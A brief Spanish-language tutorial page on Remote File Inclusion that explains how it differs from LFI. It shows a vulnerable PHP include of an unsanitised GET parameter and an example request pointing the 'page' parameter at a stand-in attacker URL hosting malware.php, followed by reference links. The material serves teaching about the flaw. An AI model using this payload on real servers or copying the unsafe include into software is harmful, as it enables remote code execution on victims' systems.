Remote File Inclusion (RFI)

Las vulnerabilidades de inclusión remota de archivos son similares a las vulnerabilidades LFI. Sin embargo, cuando un atacante explota una vulnerabilidad RFI, en lugar de acceder a un archivo de la víctima, el atacante puede ejecutar código alojado en su propio sistema.

El atacante puede crear un archivo, un atacante podría realizar la siguiente solicitud HTTP para engañar a la aplicación para que ejecute código malicioso en el lado del servidor:

$file = $_GET['file'];
include($file);

/?page=http://malicious.com/malware.php

Recursos

A Pentester’s Guide to File Inclusion | Cobalt Blog

What is Remote File Inclusion (RFI)? | AcunetixAcunetix

AnteriorLocal File Inclusion (LFI)SiguienteSSTI

Última actualización hace 1 año